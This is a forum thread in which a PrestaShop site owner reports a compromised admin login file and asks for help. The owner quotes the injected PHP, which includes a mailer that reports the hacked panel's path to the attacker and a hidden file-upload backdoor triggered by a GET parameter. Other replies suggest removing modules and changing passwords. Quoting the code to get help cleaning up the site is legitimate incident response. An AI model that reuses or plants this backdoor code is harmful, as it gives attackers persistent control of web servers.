Jon T Posted July 21, 2016 Share Posted July 21, 2016 I maintain a prestashop site (version. 1.6.0.14) which appears to be recently infected. I noticed a php error on the login screen and on closer inspection, file LoginAdminController.php contained some additional code which looks suspicious. The php error occurred just after an SSL certicate was installed. I replaced the file with the original which fixes the problem but unfortunately the problem seems to reoccur. Here is the 2 snippets of code that have been appearing (email addresses and names edited out): $to = "*******@*******"; $subject = "panel admin prestashop ". $_SERVER['SERVER_NAME'];$header = "from: hacked <*******@******>";$message .= "Path : " . __file__;$sentmail = @mail($to, $subject, $message, $header);$sentmail1 = @mail($to, $subject, $message, $header);andif($_GET['up']){if(isset($_POST['Submit'])){$filedir = ""; $maxfile = '2000000';$mode = '0644';$userfile_name = $_FILES['image']['name'];$userfile_tmp = $_FILES['image']['tmp_name'];if(isset($_FILES['image']['name'])) {$qx = $filedir.$userfile_name;@move_uploaded_file($userfile_tmp, $qx);@chmod ($qx, octdec($mode));echo"<center><b>Done ==> $userfile_name</b></center>"; Tech support at the hosting company say it is an injection and cannot explain where it has come from. Can anyone shed any light on this and perhaps recommend a course of action? Link to comment Share on other sites More sharing options...
shokinro Posted July 21, 2016 Share Posted July 21, 2016 (edited) have you installed any new 3rd party modules free modules recently? if so, you may consider to uninstall and remove the module and also please try to change your store admin password as soon as possible. Edited July 21, 2016 by shokinro (see edit history) Link to comment Share on other sites More sharing options...
shokinro Posted July 21, 2016 Share Posted July 21, 2016 Tech support at the hosting company say it is an injection and cannot explain where it has come from. Are they able to find out who modified file? It is from the user account or ftp access account? You can find what files have been changed from your store back office - Advanced Parameters - Configuration. It may have you figured out something and recover the files. Link to comment Share on other sites More sharing options...
Jon T Posted July 21, 2016 Author Share Posted July 21, 2016 Hi Shokinro, Thanks for your quick reply. I can confirm that all passwords (User Accounts and FTP) have been changed and, no, there are no free 3rd-party modules installed. I have asked tech support if they can find out who/what changed the file. Link to comment Share on other sites More sharing options...
shokinro Posted July 21, 2016 Share Posted July 21, 2016 hope you can figured out something and prevent it from happening again. Link to comment Share on other sites More sharing options...
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now